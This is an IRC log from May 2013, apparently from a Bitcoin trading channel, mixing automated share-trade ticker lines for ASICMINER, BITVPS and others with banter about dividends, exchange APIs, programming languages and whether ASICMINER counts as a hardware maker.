anyways, this all started because erik's talk on the attribute-based theory of money May 29 19:05:37 which he may have made clear enough for some above average americans to understand May 29 19:05:50 yeah, the kid is smart. May 29 19:05:50 [BTCTC] [ASICMINER-PT] 2 @ 2.549 = 5.098 BTC [+] May 29 19:06:03 [HAVELOCK] [ASICM] 3 @ 0.02539 = 0.0762 BTC [+] May 29 19:06:05 [BTCTC] [ASICMINER-PT] 5 @ 2.54999 = 12.75 BTC [+] May 29 19:06:09 mircea_popescu: its not just that he's smart, he is smart enough to explain it to dumb people, thats the hard part May 29 19:06:19 yee May 29 19:06:30 i believe einstein said that May 29 19:06:41 if you're young at heart May 29 19:06:42 i suppose May 29 19:07:33 kakobrekla http://bitbet.us/bet/453/block-239905-difficulty-will-be-an-even-number/#c992 May 29 19:07:37 da fuck is that you tell me ? May 29 19:08:03 [HAVELOCK] [ASICM] 14 @ 0.02539 = 0.3555 BTC [+] May 29 19:08:34 mircea_popescu, ya but its not in color May 29 19:08:42 aw fuck May 29 19:08:44 its red. May 29 19:08:50 [BTCTC] [ASICMINER-PT] 3 @ 2.551 = 7.653 BTC [+] May 29 19:08:51 dude. May 29 19:08:55 [BTCTC] [ASICMINER-PT] 1 @ 2.552 BTC [+] May 29 19:08:58 you know what that means May 29 19:10:02 [HAVELOCK] [ASICM] 36 @ 0.02511 = 0.904 BTC [-] May 29 19:10:31 "Better than Satoshidice, only 1% fee." May 29 19:10:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.025267 BTC [+] May 29 19:10:42 [BTCTC] [ASICMINER-PT] 2 @ 2.549 = 5.098 BTC [-] May 29 19:10:59 [BTCTC] [ASICMINER-PT] 1 @ 2.549999 BTC [+] May 29 19:11:06 well ya but you gotta wait a few weeks May 29 19:11:32 when u coulda had your satoshi in asicminer sitting on sweet divs May 29 19:12:03 [HAVELOCK] [ASICM] 137 @ 0.0251 = 3.4387 BTC [-] May 29 19:12:04 [HAVELOCK] [ASICM] 9 @ 0.0251 = 0.2259 BTC [-] May 29 19:12:09 i dont touch that part May 29 19:12:14 back May 29 19:12:25 [BTCTC] [TAT.ASICMINER] 3 @ 0.02527 = 0.0758 BTC [+] May 29 19:12:35 [BTCTC] [BASIC-MINING] 1 @ 0.64 BTC [+] May 29 19:12:38 [10:02:15] why you cashing out D3 May 29 19:12:45 [BTCTC] [TAT.ASICMINER] 3 @ 0.02521 = 0.0756 BTC [-] May 29 19:12:52 Scrat: because I might need it for DMC 2.0 May 29 19:13:08 [10:02:03] Diablo-D3: if you are selling that many, would you be interested in selling 80 to a colleague of mine?ç May 29 19:13:10 why? May 29 19:13:19 Diablo-D3: never mind i found another seller :) May 29 19:13:20 [BTCTC] [TAT.ASICMINER] 11 @ 0.02521 = 0.2773 BTC [-] May 29 19:13:38 the question of why is irrelevant i think, anyway May 29 19:13:52 the guy wants to buy btc, do you want to examine his motives? lol May 29 19:14:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.025269 = 0.0758 BTC [+] May 29 19:14:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [-] May 29 19:14:35 [BTCTC] [TAT.ASICMINER] 4 @ 0.0251 = 0.1004 BTC [-] May 29 19:14:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.0251 BTC [-] May 29 19:14:42 diablo only sells to guys with hot gfs. May 29 19:14:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] May 29 19:14:55 [BTCTC] [TAT.ASICMINER] 15 @ 0.025 = 0.375 BTC [-] May 29 19:15:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.02495 = 0.0998 BTC [-] May 29 19:15:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [-] May 29 19:15:10 [BTCTC] [TAT.ASICMINER] 373 @ 0.0249 = 9.2877 BTC [-] May 29 19:15:31 sell sell sell May 29 19:15:57 [BTCTC] [TAT.ASICMINER] 217 @ 0.0249 = 5.4033 BTC [-] May 29 19:16:03 [HAVELOCK] [ASICM] 4 @ 0.02511 = 0.1004 BTC [+] May 29 19:16:09 its actually smarter to sell before divs are issued, usually the peak point for the price May 29 19:16:29 [BTCTC] [ASICMINER-PT] 2 @ 2.565 = 5.13 BTC [+] May 29 19:16:48 dividends are alreayd released on havelock May 29 19:16:50 [BTCTC] [ASICMINER-PT] 2 @ 2.566 = 5.132 BTC [+] May 29 19:16:55 for ascim May 29 19:17:01 topace: but this selling is on btct May 29 19:17:12 (what i was talking about) May 29 19:17:37 heh cant help it btct is slow :p May 29 19:17:43 blame ThickAsThieves :P May 29 19:17:48 !e May 29 19:18:03 [HAVELOCK] [ASICM] 2 @ 0.02502 = 0.05 BTC [-] May 29 19:18:17 topace: can i get API access to havelock tickers somehow? im building a (free) data aggregator service May 29 19:18:25 [BTCTC] [ASICMINER-PT] 2 @ 2.575 = 5.15 BTC [+] May 29 19:18:27 [BTCTC] [BITVPS] 9 @ 0.000749 = 0.0067 BTC [+] May 29 19:18:39 i could set up a bot in here to sit and watch but i am loathe to that idea May 29 19:18:48 fiat500: yea https://www.havelockinvestments.com/apidoc.php May 29 19:18:52 thanks May 29 19:19:02 need to be logged in to see the docs i think, but the ticker api doesnt require auth May 29 19:19:03 [HAVELOCK] [ASICM] 400 @ 0.02501 = 10.004 BTC [-] May 29 19:21:04 [HAVELOCK] [ASICM] 10 @ 0.02511 = 0.2511 BTC [+] May 29 19:21:20 [BTCTC] [COGNITIVE] 7 @ 0.30994 = 2.1696 BTC [+] May 29 19:21:29 thanks topace thats exactly what i need May 29 19:21:57 :) May 29 19:21:59 the api isnt complete yet May 29 19:21:59 (well, streaming API would be great but i can work with this) May 29 19:22:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.02527 BTC [+] May 29 19:22:09 but ticker stuff is all there May 29 19:22:13 and basic account queries May 29 19:22:14 [BTCTC] [ASICMINER-PT] 1 @ 2.574 BTC [-] May 29 19:22:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.02527 BTC [+] May 29 19:24:03 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [-] May 29 19:24:05 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [-] May 29 19:24:18 have lock, will trade May 29 19:24:49 when does asicminer div come out again May 29 19:24:53 is it mondays? May 29 19:24:57 jcpham: today May 29 19:24:59 already paid on havelock May 29 19:25:03 [HAVELOCK] [ASICM] 2 @ 0.0248 = 0.0496 BTC [-] May 29 19:25:03 oh May 29 19:25:26 it's always on wednesdays May 29 19:25:27 ? May 29 19:25:39 usagi: that's because it is May 29 19:26:03 [HAVELOCK] [ASICM] 5 @ 0.02497 = 0.1249 BTC [+] May 29 19:26:31 thanks TAT May 29 19:26:36 [BTCTC] [ASICMINER-PT] 2 @ 2.5661 = 5.1322 BTC [-] May 29 19:27:02 [HAVELOCK] [ASICM] 3 @ 0.02497 = 0.0749 BTC [+] May 29 19:27:22 usagi: objc is spectacular May 29 19:27:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.0251 = 0.0502 BTC [-] May 29 19:27:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.02535 BTC [+] May 29 19:27:54 its quite verbose yes, but with the right completion plugins in vim/subl it becomes irrelevant how verbose it is May 29 19:28:03 [HAVELOCK] [ASICM] 6 @ 0.0252 = 0.1512 BTC [+] May 29 19:28:26 [BTCTC] [TAT.ASICMINER] 21 @ 0.0251 = 0.5271 BTC [-] May 29 19:28:53 http://www.coindesk.com/is-litecoin-the-new-bitcoin-alternative-for-investors/ May 29 19:28:55 [BTCTC] [ASICMINER-PT] 2 @ 2.566 = 5.132 BTC [-] May 29 19:28:59 the answer is no May 29 19:29:18 usagi: objc has dot notation May 29 19:29:18 fiat500: go learn erlang May 29 19:29:26 Diablo-D3: i prefer SML May 29 19:29:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.02535 = 0.2535 BTC [+] May 29 19:29:52 usagi: no its not the same May 29 19:30:02 [HAVELOCK] [ASICM] 2 @ 0.0252 = 0.0504 BTC [+] May 29 19:30:03 thats not necessarily a bad thing however May 29 19:30:03 [HAVELOCK] [ASICM] 1 @ 0.0252 BTC [+] May 29 19:30:29 <3 erlang May 29 19:30:46 >_> May 29 19:30:52 if you dont like autorelease dont use it **** BEGIN LOGGING AT Wed May 29 20:06:30 2013 May 29 20:06:45 [BTCTC] [ASICMINER-PT] 1 @ 2.525201 BTC [-] May 29 20:06:55 [BTCTC] [ASICMINER-PT] 1 @ 2.525008 BTC [-] May 29 20:06:57 [BTCTC] [ASICMINER-PT] 4 @ 2.525 = 10.1 BTC [-] May 29 20:06:59 [BTCTC] [ASICMINER-PT] 1 @ 2.52202 BTC [-] May 29 20:07:01 [BTCTC] [ASICMINER-PT] 1 @ 2.511 BTC [-] May 29 20:07:03 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] May 29 20:07:05 [BTCTC] [ASICMINER-PT] 5 @ 2.5002 = 12.501 BTC [-] May 29 20:07:08 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 29 20:07:51 [BTCTC] [ASICMINER-PT] 1 @ 2.5738 BTC [+] May 29 20:08:24 <@assbot> +[BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] May 29 20:08:24 <@assbot> +[BTCTC] [ASICMINER-PT] 1 @ 2.5738 BTC [+] May 29 20:08:27 wtf is that May 29 20:09:05 [BTCTC] [TAT.ASICMINER] 7 @ 0.025343 = 0.1774 BTC [+] May 29 20:09:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.025343 = 0.0507 BTC [+] May 29 20:09:08 [BTCTC] [TAT.ASICMINER] 58 @ 0.025344 = 1.47 BTC [+] May 29 20:09:18 someone sold 15 *into* the bids, and someone else didn't want to wait and bought *into* the sells May 29 20:09:40 i know, its just old to see that spread May 29 20:09:44 *odd May 29 20:10:01 right before divs.. it's a weird time May 29 20:10:31 [BTCTC] [TAT.ASICMINER] 50 @ 0.025344 = 1.2672 BTC [+] May 29 20:11:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.025344 BTC [+] May 29 20:11:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.025344 = 0.1521 BTC [+] May 29 20:12:02 [HAVELOCK] [ASICM] 6 @ 0.02498 = 0.1499 BTC [+] May 29 20:12:47 [BTCTC] [TAT.ASICMINER] 3 @ 0.025344 = 0.076 BTC [+] May 29 20:13:01 [HAVELOCK] [ASICM] 2 @ 0.02498 = 0.05 BTC [+] May 29 20:13:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.025344 BTC [+] May 29 20:13:31 [BTCTC] [BITVPS] 396 @ 0.00063 = 0.2495 BTC [-] May 29 20:13:33 [BTCTC] [BITVPS] 20 @ 0.000629 = 0.0126 BTC [-] May 29 20:13:35 [BTCTC] [BITVPS] 200 @ 0.000628 = 0.1256 BTC [-] May 29 20:13:37 [BTCTC] [BITVPS] 10 @ 0.000626 = 0.0063 BTC [-] May 29 20:13:39 [BTCTC] [ASICMINER-PT] 1 @ 2.5738 BTC [+] May 29 20:13:40 [BTCTC] [BITVPS] 200 @ 0.000624 = 0.1248 BTC [-] May 29 20:13:42 [BTCTC] [ASICMINER-PT] 1 @ 2.5739 BTC [+] May 29 20:13:43 [BTCTC] [BITVPS] 2 @ 0.000622 = 0.0012 BTC [-] May 29 20:13:44 [BTCTC] [BITVPS] 1 @ 0.00062 BTC [-] May 29 20:13:44 [BTCTC] [ASICMINER-PT] 1 @ 2.5739 BTC [+] May 29 20:13:46 [BTCTC] [BITVPS] 500 @ 0.000613 = 0.3065 BTC [-] May 29 20:13:47 [BTCTC] [ASICMINER-PT] 1 @ 2.574 BTC [+] May 29 20:13:48 [BTCTC] [BITVPS] 1 @ 0.00061 BTC [-] May 29 20:13:49 [BTCTC] [ASICMINER-PT] 1 @ 2.574 BTC [+] May 29 20:13:50 [BTCTC] [BITVPS] 30 @ 0.000604 = 0.0181 BTC [-] May 29 20:13:51 [BTCTC] [ASICMINER-PT] 2 @ 2.576 = 5.152 BTC [+] May 29 20:13:52 [BTCTC] [BITVPS] 20 @ 0.000602 = 0.012 BTC [-] May 29 20:13:54 [BTCTC] [BITVPS] 30 @ 0.000602 = 0.0181 BTC [-] May 29 20:13:55 [BTCTC] [BITVPS] 5 @ 0.000601 = 0.003 BTC [-] May 29 20:13:55 [BTCTC] [BITVPS] 245 @ 0.000601 = 0.1472 BTC [-] May 29 20:13:56 [BTCTC] [BITVPS] 249 @ 0.0006 = 0.1494 BTC [-] May 29 20:13:57 [BTCTC] [BITVPS] 450 @ 0.000592 = 0.2664 BTC [-] May 29 20:13:58 [BTCTC] [BITVPS] 10 @ 0.000591 = 0.0059 BTC [-] May 29 20:14:00 [BTCTC] [BITVPS] 490 @ 0.000591 = 0.2896 BTC [-] May 29 20:14:00 jesu christe May 29 20:14:02 wtf is going on May 29 20:14:14 [BTCTC] [ASICMINER-PT] 1 @ 2.573799 BTC [-] May 29 20:14:21 woohoo May 29 20:14:50 [MPEX] [S.MPOE] 3000 @ 0.00073829 = 2.2149 BTC [-] May 29 20:14:56 that was a huge sell into the bids on bitvps i guess May 29 20:15:02 [HAVELOCK] [ASICM] 2 @ 0.02498 = 0.05 BTC [+] May 29 20:16:02 thats a bit of a stretch May 29 20:16:32 [proof] May 29 20:16:45 what is your proof :p May 29 20:17:02 [HAVELOCK] [ASICM] 3 @ 0.02498 = 0.0749 BTC [+] May 29 20:17:04 [BTCTC] [TAT.ASICMINER] 13 @ 0.025344 = 0.3295 BTC [+] May 29 20:17:05 why would anyone want to manipulate something as mundane as bitvps? May 29 20:17:24 rofl May 29 20:17:44 lemme guess, bitvps is about to launch an incredible new strategy, and they want to buy cheap shares May 29 20:18:25 my guess is that they are or will be subject to incredible ddos May 29 20:18:34 that will finally put them out of bsnss May 29 20:18:55 conspiracy: ddos operated by the koddos people May 29 20:19:02 [HAVELOCK] [ASICM] 2 @ 0.02498 = 0.05 BTC [+] May 29 20:19:44 would that be horizontal or vertical expansion for koddos? May 29 20:19:59 diagonal May 29 20:19:59 not sure May 29 20:20:01 [HAVELOCK] [ASICM] 13 @ 0.02498 = 0.3247 BTC [+] May 29 20:20:05 [BTCTC] [ASICMINER-PT] 3 @ 2.57799 = 7.734 BTC [+] May 29 20:20:07 [BTCTC] [ASICMINER-PT] 1 @ 2.578 BTC [+] May 29 20:22:09 jurov: circular May 29 20:23:16 [BTCTC] [TAT.ASICMINER] 9 @ 0.025343 = 0.2281 BTC [-] May 29 20:24:01 [HAVELOCK] [ASICM] 22 @ 0.02498 = 0.5496 BTC [+] May 29 20:24:02 [HAVELOCK] [ASICM] 1 @ 0.02498 BTC [+] May 29 20:26:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.025343 = 0.0507 BTC [-] May 29 20:26:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.025343 = 0.0507 BTC [-] May 29 20:27:02 [HAVELOCK] [ASICM] 98 @ 0.02498 = 2.448 BTC [+] May 29 20:28:01 [HAVELOCK] [ASICM] 2 @ 0.025 = 0.05 BTC [+] May 29 20:28:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.025343 BTC [-] May 29 20:29:02 [HAVELOCK] [ASICM] 4 @ 0.025 = 0.1 BTC [+] May 29 20:29:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.025343 = 0.2534 BTC [-] May 29 20:30:01 [HAVELOCK] [ASICM] 19 @ 0.025 = 0.475 BTC [+] May 29 20:33:02 [HAVELOCK] [ASICM] 1 @ 0.025 BTC [+] May 29 20:33:19 usagi: ping May 29 20:33:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.025343 = 0.0507 BTC [-] May 29 20:33:56 meh fine May 29 20:35:02 [HAVELOCK] [ASICM] 10 @ 0.025 = 0.25 BTC [+] May 29 20:35:03 [HAVELOCK] [ASICM] 25 @ 0.025 = 0.625 BTC [+] May 29 20:36:02 [HAVELOCK] [ASICM] 3 @ 0.025 = 0.075 BTC [+] May 29 20:37:08 ;;ticker 550 * [ticker --last] May 29 20:37:08 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) May 29 20:37:22 ;;ticker 550 * [[ticker --last]] May 29 20:37:23 Error: "129.68900" is not a valid command. May 29 20:37:34 ;;calc 550 * [[ticker --last]] May 29 20:37:34 Error: "129.68900" is not a valid command. May 29 20:37:42 ;;calc 550 * [ticker --last] May 29 20:37:43 71328.95 May 29 20:37:46 there damnit. May 29 20:39:02 [HAVELOCK] [ASICM] 100 @ 0.025 = 2.5 BTC [+] May 29 20:41:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.025343 = 0.0507 BTC [-] May 29 20:42:02 [HAVELOCK] [ASICM] 12 @ 0.025 = 0.3 BTC [+] May 29 20:42:04 [BTCTC] [COGNITIVE] 4 @ 0.30994 = 1.2398 BTC [+] May 29 20:43:00 [HAVELOCK] [ASICM] 1 @ 0.0251 BTC [+] May 29 20:45:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.0253 BTC [-] May 29 20:47:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0253 BTC [-] May 29 20:47:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.0253 = 0.0506 BTC [-] May 29 20:48:01 [HAVELOCK] [ASICM] 4 @ 0.0251 = 0.1004 BTC [+] May 29 20:48:02 [HAVELOCK] [ASICM] 33 @ 0.0252 = 0.8316 BTC [+] May 29 20:50:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.025339 = 0.076 BTC [+] May 29 20:53:02 [HAVELOCK] [ASICM] 13 @ 0.0252 = 0.3276 BTC [+] May 29 20:54:47 [BTCTC] [ASICMINER-PT] 3 @ 2.576 = 7.728 BTC [-] May 29 20:59:56 [BTCTC] [ASICMINER-PT] 1 @ 2.577 BTC [+] May 29 21:01:06 [BTCTC] [ASICMINER-PT] 1 @ 2.560001 BTC [-] May 29 21:02:20 [BTCTC] [ASICMINER-PT] 6 @ 2.56 = 15.36 BTC [-] May 29 21:03:02 [HAVELOCK] [ASICM] 6 @ 0.025299 = 0.1518 BTC [+] May 29 21:03:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.02511 = 0.0502 BTC [-] May 29 21:09:27 [BTCTC] [COGNITIVE] 6 @ 0.30995 = 1.8597 BTC [+] May 29 21:10:08 [BTCTC] [COGNITIVE] 3 @ 0.309997 = 0.93 BTC [+] May 29 21:10:16 There are currently 464.31805 bitcoins offered at or under 130.0 USD, worth 60360.8738333 USD in total. | Data vintage: 0.0124 seconds May 29 21:13:01 [HAVELOCK] [ASICM] 4 @ 0.025298 = 0.1012 BTC [-] May 29 21:13:17 [BTCTC] [BASIC-MINING] 1 @ 0.64 BTC [+] May 29 21:15:01 [HAVELOCK] [ASICM] 2011 @ 0.0251 = 50.4761 BTC [-] May 29 21:15:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.025011 = 0.05 BTC [-] May 29 21:15:43 dang thats a biggun May 29 21:15:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.0252 = 0.0504 BTC [+] May 29 21:15:58 [BTCTC] [BASIC-MINING] 1 @ 0.64 BTC [+] May 29 21:16:04 that was a big bid... May 29 21:16:16 oh wait, its the 100PT May 29 21:16:30 i thought 2011 @ full share price lmfao May 29 21:16:35 hehe May 29 21:17:04 [BTCTC] [ASICMINER-PT] 1 @ 2.575 BTC [+] May 29 21:17:13 [BTCTC] [ASICMINER-PT] 2 @ 2.576 = 5.152 BTC [+] May 29 21:17:49 [BTCTC] [BASIC-MINING] 3 @ 0.64 = 1.92 BTC [+] May 29 21:18:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [+] May 29 21:18:57 i wonder whats gonna happen when basic-mining buys those AM shares May 29 21:19:29 [BTCTC] [S.DICE-PT] 1 @ 0.002967 BTC [-] May 29 21:19:35 wont find out til june 4th i guess May 29 21:20:00 whats his budget? May 29 21:22:31 [BTCTC] [ASICMINER-PT] 1 @ 2.535 BTC [-] May 29 21:22:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.0252 = 0.0504 BTC [+] May 29 21:24:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.0252 = 0.252 BTC [+] May 29 21:25:11 [BTCTC] [TAT.ASICMINER] 28 @ 0.025011 = 0.7003 BTC [-] May 29 21:25:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [-] May 29 21:26:00 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [-] May 29 21:26:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.025001 BTC [+] May 29 21:28:35 [BTCTC] [TAT.ASICMINER] 41 @ 0.0252 = 1.0332 BTC [+] May 29 21:30:02 [HAVELOCK] [ASICM] 1 @ 0.025298 BTC [+] May 29 21:40:01 [HAVELOCK] [ASICM] 35 @ 0.025298 = 0.8854 BTC [+] May 29 21:40:02 [HAVELOCK] [ASICM] 1 @ 0.025298 BTC [+] May 29 21:40:56 kakobrekla https://bitcointalk.org/index.php?topic=188735.msg2306172#msg2306172 lol May 29 21:42:01 [HAVELOCK] [ASICM] 50 @ 0.025298 = 1.2649 BTC [+] May 29 21:42:32 [MPEX] [S.MPOE] 12500 @ 0.00073673 = 9.2091 BTC [-] May 29 21:45:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.0252 = 0.0504 BTC [+] May 29 21:47:06 [BTCTC] [TAT.ASICMINER] 5 @ 0.0253 = 0.1265 BTC [+] May 29 21:47:33 [BTCTC] [ASICMINER-PT] 1 @ 2.572 BTC [+] May 29 21:48:24 [BTCTC] [ASICMINER-PT] 2 @ 2.572 = 5.144 BTC [+] May 29 21:49:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0253 BTC [+] May 29 21:49:23 [BTCTC] [ASICMINER-PT] 11 @ 2.5729 = 28.3019 BTC [+] May 29 21:50:08 [BTCTC] [TAT.ASICMINER] 10 @ 0.02529 = 0.2529 BTC [-] May 29 21:50:14 ThickAsThieves: he wants to buy 200 shares May 29 21:50:22 [BTCTC] [BASIC-MINING] 2 @ 0.64 = 1.28 BTC [+] May 29 21:50:24 [BTCTC] [TAT.ASICMINER] 29 @ 0.025299 = 0.7337 BTC [+] May 29 21:50:27 [BTCTC] [ASICMINER-PT] 1 @ 2.5729 BTC [+] May 29 21:50:36 [BTCTC] [TAT.ASICMINER] 13 @ 0.0253 = 0.3289 BTC [+] May 29 21:50:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.0252 = 0.0504 BTC [-] May 29 21:50:54 best place is jutarul at this point May 29 21:51:11 [BTCTC] [TAT.ASICMINER] 40 @ 0.0253 = 1.012 BTC [+] May 29 21:51:12 but if he's sold out tell him to make me an offer May 29 21:51:12 [BTCTC] [ASICMINER-PT] 7 @ 2.573 = 18.011 BTC [+] May 29 21:51:19 ThickAsThieves: 200 of ASICMINER-PT May 29 21:51:33 why not buy direct? May 29 21:51:34 is the current proposal May 29 21:51:41 he wants to do it on btct May 29 21:51:42 jutarul is selling at 2.5 May 29 21:51:53 he can move em to BTCTC after May 29 21:51:56 he should buy direct and move yes May 29 21:52:01 motion looks like it will pass May 29 21:52:15 otherwise i can give him a better price than AM-PT May 29 21:52:19 if he's interested May 29 21:52:22 why dont you pm him? May 29 21:52:26 who? May 29 21:52:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0253 BTC [+] May 29 21:52:32 [BTCTC] [TAT.ASICMINER] 8 @ 0.0253 = 0.2024 BTC [+] May 29 21:52:32 https://bitcointalk.org/index.php?action=profile;u=36667 May 29 21:53:01 [HAVELOCK] [ASICM] 1 @ 0.025298 BTC [+] May 29 21:53:13 it is in my best interest as an AM-PT shareholder on btct of course, if he buys from there May 29 21:54:01 [HAVELOCK] [ASICM] 3 @ 0.0251 = 0.0753 BTC [-] May 29 21:54:02 [HAVELOCK] [ASICM] 1 @ 0.0251 BTC [-] May 29 21:54:03 [HAVELOCK] [ASICM] 1 @ 0.0251 BTC [-] May 29 21:54:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [-] May 29 21:55:01 [HAVELOCK] [ASICM] 30 @ 0.025 = 0.75 BTC [-] May 29 21:55:02 [HAVELOCK] [ASICM] 1 @ 0.02505 BTC [+] May 29 21:55:04 [HAVELOCK] [ASICM] 32 @ 0.02504 = 0.8013 BTC [-] May 29 21:55:05 [HAVELOCK] [ASICM] 9 @ 0.02503 = 0.2253 BTC [-] May 29 21:55:26 yeah but it's silly to overpay May 29 21:55:31 grasping at straws really, spending 500btc to make 5.6btc per week May 29 21:55:33 i have shares of all types May 29 21:55:41 assuming AM maintains current payout levels May 29 21:55:51 AM is still the best payout out there May 29 21:55:53 this is what they call having more money than sense May 29 21:56:04 basic's market cap is 2400 btc ffs May 29 21:56:43 even if AM only pays .015/week, and he pays 2.6 per share, May 29 21:56:52 thats still 2.5% monthly May 29 21:56:58 hard to beat May 29 21:57:35 true, but then why bother with basic at all, it becomes a passthrough of a passthrough May 29 21:58:29 even worse really, because only 20% of market cap is being invested in AM May 29 21:59:04 AM is still the best payout out there << not really. May 29 21:59:19 depends how you calculate your amortisation. May 29 22:00:01 [HAVELOCK] [ASICM] 4 @ 0.025297 = 0.1012 BTC [+] May 29 22:00:09 mircea_popescu: this is bitcoin, everyone is amortising over a period of time long enough such that cost is effectively 0 May 29 22:00:30 oic. nm then May 29 22:00:56 [BTCTC] [B.YABMC] 1 @ 0.01699 BTC [+] May 29 22:01:00 :P May 29 22:01:02 [HAVELOCK] [ASICM] 1 @ 0.025297 BTC [+] May 29 22:01:38 i'm really not sure how much AM will depreciate over time May 29 22:01:45 it's just not a normal mining stock May 29 22:01:56 yes commoditization is imminent May 29 22:01:56 [BTCTC] [TAT.ASICMINER] 5 @ 0.0253 = 0.1265 BTC [+] May 29 22:02:04 [HAVELOCK] [ASICM] 7 @ 0.025297 = 0.1771 BTC [+] May 29 22:02:07 i think mircea_popescu is saying you should take opportuniy cost into account May 29 22:02:09 but they could lead that if they play their cards right May 29 22:02:33 (or, i am, anyway) May 29 22:03:04 ThickAsThieves historically, every single mining stock was, in its heyday, "just not a normal mining stock" May 29 22:03:21 similarly, every 19yo is "just not another normal fat middle aged woman" May 29 22:03:21 sure. May 29 22:03:25 lmao May 29 22:03:41 has there ever been a mining stock that sold hardware at retail? May 29 22:03:53 actually, yes. May 29 22:03:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.025295 = 0.253 BTC [-] May 29 22:04:01 who? May 29 22:04:11 [BTCTC] [TAT.ASICMINER] 83 @ 0.0253 = 2.0999 BTC [+] May 29 22:04:11 depends on your definitions, but fpga people sold fpgas and gpu people sold gpus May 29 22:04:52 you mean used hardware in very small qty? May 29 22:05:01 [HAVELOCK] [ASICM] 3 @ 0.025297 = 0.0759 BTC [+] May 29 22:05:04 or? May 29 22:05:04 [BTCTC] [BTC-BOND] 4 @ 0.01049 = 0.042 BTC [+] May 29 22:05:04 "very small" May 29 22:05:14 [BTCTC] [GSDPT] 78 @ 0.002711 = 0.2115 BTC [-] May 29 22:05:17 if you go by %s am sales are very small, moreso than gpu sales May 29 22:05:21 [BTCTC] [BTC-BOND] 40 @ 0.010499 = 0.42 BTC [+] May 29 22:06:01 [HAVELOCK] [HIM] 1 @ 2.7 BTC [-] May 29 22:06:05 so you are saying AM is no different than a GPU mining farm selling off it's used cards? May 29 22:06:09 is it ? May 29 22:06:13 of course it is May 29 22:06:15 how ? May 29 22:06:22 they are a hardware manufacturer May 29 22:06:25 not really. May 29 22:06:31 they're just ordering some parts from a manufacturer May 29 22:06:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.025299 BTC [-] May 29 22:06:52 [BTCTC] [B.YABMC] 3 @ 0.01699 = 0.051 BTC [+] May 29 22:06:53 is apple not a phone manufacturer? May 29 22:07:03 indeed not. it just markets the phones. May 29 22:07:03 eh, dicey May 29 22:07:03 [BTCTC] [PAJKA.BOND] 1 @ 0.10901 BTC [+] May 29 22:07:05 [BTCTC] [PAJKA.BOND] 4 @ 0.1099 = 0.4396 BTC [+] May 29 22:07:06 [BTCTC] [PAJKA.BOND] 2 @ 0.109988 = 0.22 BTC [+] May 29 22:07:06 [BTCTC] [PAJKA.BOND] 43 @ 0.109999 = 4.73 BTC [+] May 29 22:07:11 ok, let me broaden May 29 22:07:24 apple's cost of producing a phone is a lot higher than foxconn's cost May 29 22:07:27 are not all phones made from pieces sourced from other manufacturers? May 29 22:07:28 ThickAsThieves but for the record, this is very much dependent on where you draw the lines May 29 22:07:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.025299 = 0.0506 BTC [-] May 29 22:07:33 samsung OTOH /is/ a manufacturer May 29 22:07:35 im not presentin this as an absolute truth or anything May 29 22:07:55 you are presenting it as a large consideration May 29 22:08:00 [HAVELOCK] [ASICM] 15 @ 0.025297 = 0.3795 BTC [+] May 29 22:08:02 for my own needs. May 29 22:08:05 that AM is no better than a mining farm of GPUs May 29 22:08:13 that it's not structurally different May 29 22:08:18 that was our contention. May 29 22:08:22 to what effective point? May 29 22:08:26 ikr? May 29 22:08:37 you trollin me? May 29 22:08:39 [BTCTC] [S.MPOE-PT] 1000 @ 0.000672 = 0.672 BTC [-] May 29 22:08:46 [BTCTC] [B.YABMC] 95 @ 0.01699 = 1.6141 BTC [+] May 29 22:08:48 [BTCTC] [B.YABMC] 5 @ 0.0177 = 0.0885 BTC [+] May 29 22:08:50 [BTCTC] [TAT.ASICMINER] 4 @ 0.025299 = 0.1012 BTC [-] May 29 22:08:50 not rly. May 29 22:08:55 lol May 29 22:09:10 